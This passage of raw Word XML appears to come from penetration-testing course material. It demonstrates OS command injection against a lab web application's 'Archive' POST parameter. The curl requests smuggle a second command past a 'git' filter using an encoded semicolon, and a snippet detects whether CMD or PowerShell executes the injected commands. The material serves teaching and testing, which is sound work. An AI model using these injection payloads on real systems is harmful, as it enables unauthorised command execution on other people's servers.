      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. Let's attempt to backtrack from the working input and find a bypass for the filter. Next, we'll try to only provide the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command for the Archive parameter in the POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl -X POST --data 'Archive=git' http://192.168.50.189:8000/archive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An error occured with execution: exit status 1 and usage: git [--version] [--help] [-C &lt;path&gt;] [-c &lt;name&gt;=&lt;value&gt;]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">           [--exec-path[=&lt;path&gt;]] [--html-path] [--man-path] [--info-path]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">           [-p | --paginate | -P | --no-pager] [--no-replace-objects] [--bare]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   push      Update remote refs along with associated objects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'git help -a' and 'git help -g' list available subcommands and some</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">concept guides. See 'git help &lt;command&gt;' or 'git help &lt;concept&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to read about a specific subcommand or concept.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See 'git help git' for an overview of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E16">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 41 - Entering git as command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E17">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output shows the help page for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command, confirming that we are not restricted to only using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since we know that only providing "git" works for execution, we can try to add the</w:t>
      </w:r>
      <w:hyperlink r:id="rId304">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId305">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">version</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> subcommand. If this is executed, we'll establish that we can specify any </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command and achieve code execution. This will also reveal if the web application is running on Windows or Linux, since the output of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git version</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> includes the "Windows" string in</w:t>
      </w:r>
      <w:hyperlink r:id="rId306">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId307">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Git for Windows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the web application is running on Linux, it will only show the version for Git.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl -X POST --data 'Archive=git version' http://192.168.50.189:8000/archive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Repository successfully cloned with command: git version and output: git version 2.35.1.windows.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E1D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 41 - Using git version to detect the operating system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E1E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output shows that the web application is running on Windows. Now we can use trial-and-error to poke around the filter and review what's allowed. Since we established that we cannot simply specify another command, let's try to combine the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands with a URL-encoded semicolon represented as "%3B". Semicolons can be used in a majority of command lines, such as PowerShell or Bash as a delimiter for multiple commands. Alternatively, we can use two ampersands, "&amp;&amp;", to specify two consecutive commands. For the Windows command line</w:t>
      </w:r>
      <w:hyperlink r:id="rId308">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId309">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">(CMD)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can also use one ampersand.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl -X POST --data 'Archive=git%3Bipconfig' http://192.168.50.189:8000/archive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E20">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'git help -a' and 'git help -g' list available subcommands and some</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">concept guides. See 'git help &lt;command&gt;' or 'git help &lt;concept&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E24">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to read about a specific subcommand or concept.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See 'git help git' for an overview of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E26">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E27">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows IP Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E29">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ethernet adapter Ethernet0 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   Connection-specific DNS Suffix  . : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   IPv4 Address. . . . . . . . . . . : 192.168.50.189</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E2E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   Subnet Mask . . . . . . . . . . . : 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E2F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   Default Gateway . . . . . . . . . : 192.168.50.254</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E30">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E31">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 42 - Entering git and ipconfig with encoded semicolon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E32">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output shows that both commands were executed. We can assume that there is a filter in place checking if "git" is executed or perhaps contained in the "Archive" parameter. Next, let's find out more about how our injected commands are executed. We will first determine if our commands are executed by PowerShell or CMD. In a situation like this, we can use a handy snippet, published by</w:t>
      </w:r>
      <w:hyperlink r:id="rId310">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId311">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PetSerAl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that displays "CMD" or "PowerShell" depending on where it is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E33">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(dir 2&gt;&amp;1 *`|echo CMD);&amp;&lt;# rem #&gt;echo PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E34">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E35">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 43 - Code Snippet to check where our code is executed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E36">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll use URL encoding once again to send it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
